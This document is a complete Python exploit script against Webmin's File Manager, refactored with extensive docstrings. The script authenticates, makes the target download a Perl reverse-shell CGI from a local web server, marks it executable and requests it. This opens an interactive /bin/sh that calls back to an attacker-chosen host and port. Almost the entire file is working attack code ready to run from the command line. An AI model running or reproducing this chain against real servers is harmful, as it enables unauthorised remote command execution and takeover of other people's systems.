#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import signal
import subprocess
import sys
import time

import requests
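def generate_file(filename, ip, port):
    """Write a Perl reverse-shell CGI payload to ``<filename>.cgi`` in the current directory.

    The payload connects back to ``ip``:``port`` and attaches ``/bin/sh -i`` to
    the socket. It is written without a shebang line, exactly as before. The
    rest of this script (``download_to_target`` / ``modify_perm`` / ``run``)
    expects the file to be called ``shell.cgi``, which is why ``filename`` is
    honoured here instead of ignoring the parameter and using a fixed name.

    Args:
        filename: Base name of the payload file; ``.cgi`` is appended.
        ip: Callback host, spliced into a double-quoted Perl string literal.
        port: Callback port, spliced into the Perl source as a bare number.

    Returns:
        The path of the written payload file.

    Raises:
        ValueError: if ``port`` is not a decimal TCP port, or ``ip`` contains
            quotes/whitespace; either would corrupt the generated Perl source
            and the CGI would fail silently on the target.
    """
    port = str(port)
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        raise ValueError(f"callback port must be 1-65535, got {port!r}")
    if '"' in ip or "'" in ip or any(c.isspace() for c in ip):
        raise ValueError(f"callback host must not contain quotes or whitespace, got {ip!r}")
    # %-formatting rather than an f-string: the Perl source contains literal
    # braces, and it contains no '%' characters, so this is the safer template.
    payload = (
        "perl -e 'use Socket;$i=\"%s\";$p=%s;"
        'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
        'if(connect(S,sockaddr_in($p,inet_aton($i)))){'
        'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
        'exec("/bin/sh -i");};\''
    ) % (ip, port)
    path = f"{filename}.cgi"
    # "with" guarantees the handle is flushed and closed before the local
    # http.server is started to serve this file.
    with open(path, "w") as fh:
        fh.write(payload)
    print("Generated Payload")
    return path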
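def login(sess, user, passwd, host):
    """Authenticate ``sess`` against Webmin's ``/session_login.cgi``.

    The credentials are POSTed as a form together with the ``redirect`` /
    ``testing`` / ``PHPSESSID`` cookies the original exploit sends, so the
    server issues its session cookie into ``sess``. TLS verification is
    disabled (targets typically run a self-signed certificate), which means
    the credentials are exposed to anyone who can intercept the connection.

    Args:
        sess: A ``requests.Session`` (or duck-typed equivalent) that keeps cookies.
        user: Webmin username.
        passwd: Webmin password.
        host: Base URL of the target, e.g. ``https://10.0.0.5:10000``.

    Returns:
        The final ``requests.Response`` after redirects.

    Raises:
        requests.HTTPError: on a 4xx/5xx status. NOTE(review): a wrong
            password may still come back as a 200 login page, so a normal
            return is not proof of a valid session — verify against the target.
    """
    url = host + "/session_login.cgi"
    cookies = {"redirect": "1", "testing": "1", "PHPSESSID": ""}
    body = {"user": user, "pass": passwd}
    response = sess.post(url, cookies=cookies, data=body, verify=False,
                         allow_redirects=True, timeout=30)
    # Previously "Successfully logged in" was printed unconditionally; at
    # minimum fail loudly on an HTTP error instead of continuing with no session.
    response.raise_for_status()
    print("Successfully logged in")
    return response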
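def local_fileserv(port):
    """Start ``python -m http.server`` in the current directory as a background process.

    This serves *everything* in the working directory (not only the payload),
    on all interfaces, so run the exploit from an otherwise empty directory.
    The previous implementation spliced ``port`` into an ``os.system`` shell
    string; the argument is now validated and passed as an argv list so it
    can never be interpreted by a shell.

    Args:
        port: TCP port to listen on, as a decimal string (``"0"`` lets the
            OS pick a free port).

    Returns:
        The ``subprocess.Popen`` handle of the server, so a caller can
        ``terminate()`` exactly the process it started instead of killing
        whatever happens to own the port.

    Raises:
        ValueError: if ``port`` is not a decimal integer.
    """
    port = str(port)
    if not port.isdigit():
        raise ValueError(f"file-server port must be numeric, got {port!r}")
    # sys.executable rather than a bare "python3" so the server runs under the
    # same interpreter as this script; stdout/stderr are inherited as before so
    # the server's request log still shows the target fetching the payload.
    proc = subprocess.Popen([sys.executable, "-m", "http.server", port])
    print("Python HttpServer Running")
    return proc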
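def download_to_target(sess, host, local_filehost, filepath):
    """Make the Webmin File Manager fetch the payload from our local HTTP server.

    Posts to ``/extensions/file-manager/http_download.cgi`` (``filemin``
    module) asking it to download ``http://<local_filehost>/<filepath>`` into
    ``/usr/share/webmin``; ``run`` then requests ``<host>/shell.cgi`` directly,
    so that directory is evidently served by the target's web root.

    Args:
        sess: Authenticated ``requests.Session`` (see ``login``).
        host: Base URL of the target.
        local_filehost: ``ip:port`` of the local ``http.server``.
        filepath: Name of the payload file on the local server, with or
            without a leading slash.

    Returns:
        The ``requests.Response`` from ``http_download.cgi``.

    Raises:
        requests.HTTPError: on a 4xx/5xx status. A 200 from this endpoint does
            not by itself prove the file landed on the target.
    """
    headers = {
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": host + "/filemin/?xnavigation=1",
    }
    # The previous version concatenated host and path directly, which with the
    # "shell.cgi" argument used by ``run`` produced
    # "http://1.2.3.4:8000shell.cgi" — an invalid URL. Normalise to exactly
    # one separating slash regardless of how the caller spells ``filepath``.
    link = "http://" + local_filehost.rstrip("/") + "/" + filepath.lstrip("/")
    body = {
        "link": link,
        "username": "",
        "password": "",
        "path": "/usr/share/webmin",
    }
    url = host + "/extensions/file-manager/http_download.cgi?module=filemin"
    response = sess.post(url, data=body, headers=headers, verify=False,
                         allow_redirects=True, timeout=30)
    response.raise_for_status()
    print("Payload Downloaded to remote host")
    return response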
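def modify_perm(sess, host, filename="shell.cgi", path="/usr/share/webmin"):
    """chmod the uploaded payload to 0755 via the File Manager's ``chmod.cgi``.

    Args:
        sess: Authenticated ``requests.Session`` (see ``login``).
        host: Base URL of the target.
        filename: File inside ``path`` to make executable. Defaults to the
            name the rest of this script uses, so existing callers are unchanged.
        path: Directory containing ``filename``.

    Returns:
        The ``requests.Response`` from ``chmod.cgi``.

    Raises:
        requests.HTTPError: on a 4xx/5xx status.
    """
    headers = {
        "Accept": "application/json",
        "Referer": host + "/filemin/?xnavigation=1",
    }
    # A dict instead of a hand-encoded string: requests URL-encodes the values
    # and sets Content-Type: application/x-www-form-urlencoded, which this
    # request previously omitted (download_to_target sets it explicitly).
    body = {
        "name": filename,
        "perms": "0755",
        "applyto": "1",
        "path": path,
    }
    url = host + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
    response = sess.post(url, data=body, headers=headers, verify=False,
                         allow_redirects=True, timeout=30)
    response.raise_for_status()
    print("Permission modified to execute")
    return response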
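def run(host, user, passwd, file_serv_ip, file_serv_port, revshell_ip, revshell_port, proxy):
    """Drive the full chain: payload -> login -> serve -> download -> chmod -> trigger.

    Args:
        host: Base URL of the Webmin target.
        user: Webmin username (the chain runs under an authenticated session).
        passwd: Webmin password.
        file_serv_ip: Address of this machine as the target will reach it.
        file_serv_port: Port for the local ``http.server``.
        revshell_ip: Host the reverse shell connects back to.
        revshell_port: Port the reverse shell connects back to.
        proxy: Optional proxy URL for requests to ``host`` (``""`` = none).

    Side effects: writes ``shell.cgi`` in the current directory, starts and
    then kills a local HTTP server, and executes a reverse shell on the target.
    """
    generate_file("shell", revshell_ip, revshell_port)
    websession = requests.Session()
    if proxy:
        # Previously only the "http" scheme was mapped, so --proxy silently
        # had no effect against an https:// Webmin URL (the common case).
        websession.proxies = {"http": proxy, "https": proxy}
    login(websession, user, passwd, host)
    local_fileserv(file_serv_port)
    try:
        time.sleep(3)  # give http.server a moment to bind before the target fetches from it
        download_to_target(websession, host, f"{file_serv_ip}:{file_serv_port}", "shell.cgi")
        print("Waiting for the file to download into the remote server")
        modify_perm(websession, host)
        _trigger_payload(websession, host)
    finally:
        # Clean up even when one of the steps above raises; otherwise the
        # local server keeps serving the working directory indefinitely.
        _kill_listeners_on_port(file_serv_port)
        print("Killing Python http.server")


def _trigger_payload(websession, host):
    """Request the uploaded CGI so the target executes it."""
    try:
        # The payload redirects the CGI's stdout to the reverse-shell socket,
        # so this request cannot complete normally while the shell is alive; a
        # timeout here is the expected outcome once the callback has connected.
        res = websession.get(f"{host}/shell.cgi", verify=False, allow_redirects=True, timeout=30)
        print(f"Status Code : {res.status_code}")
    except requests.exceptions.RequestException as exc:
        print(f"Trigger request ended without a normal response: {exc}")


def _kill_listeners_on_port(port):
    """Kill whatever has ``port`` open, mirroring the old ``kill -9 $(lsof -t -i:PORT)``.

    Uses argv lists instead of a shell string so ``port`` is never interpreted
    by ``sh``. Like the original, this kills *any* process on the port, not
    only the server this script started; it is skipped with a message when
    ``lsof`` is unavailable.
    """
    try:
        out = subprocess.run(["lsof", "-t", f"-i:{port}"], capture_output=True,
                             text=True, check=False)
    except FileNotFoundError:
        print("lsof not found; stop the local http.server manually")
        return
    for pid in out.stdout.split():
        try:
            os.kill(int(pid), signal.SIGKILL)
        except (ValueError, ProcessLookupError, PermissionError):
            pass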
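import argparse


def split_host_port(value, flag):
    """Split a ``HOST:PORT`` command-line value into ``(host, port)``.

    Splits on the *last* colon and reports a missing host or port as a clean
    error instead of the ``IndexError`` that ``split(":")[1]`` raised.
    Bracketed IPv6 literals are not handled.

    Args:
        value: The raw option value.
        flag: The option name, used only in the error message.

    Raises:
        ValueError: if ``value`` has no colon or an empty host or port.
    """
    host, sep, port = value.rpartition(":")
    if not sep or not host or not port:
        raise ValueError(f"{flag} must be HOST:PORT, got {value!r}")
    return host, port


# Guarded so importing this module (e.g. for testing) does not parse argv and
# launch the exploit; behaviour when executed as a script is unchanged.
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--host", required=True, help="Host url(complete)", type=str)
    parser.add_argument("--user", required=True, help="Username", type=str)
    parser.add_argument("--password", required=True, help="Password", type=str)
    parser.add_argument("--Python_server", required=True, help="Python httpServer with port", type=str)
    parser.add_argument("--callback_url", required=True, help="Callback ip and port", type=str)
    parser.add_argument("--proxy", help="Proxy details", default="", type=str)
    args = parser.parse_args()
    try:
        file_serv_ip, file_serv_port = split_host_port(args.Python_server, "--Python_server")
        revshell_ip, revshell_port = split_host_port(args.callback_url, "--callback_url")
    except ValueError as exc:
        parser.error(str(exc))
    run(args.host, args.user, args.password, file_serv_ip, file_serv_port,
        revshell_ip, revshell_port, args.proxy)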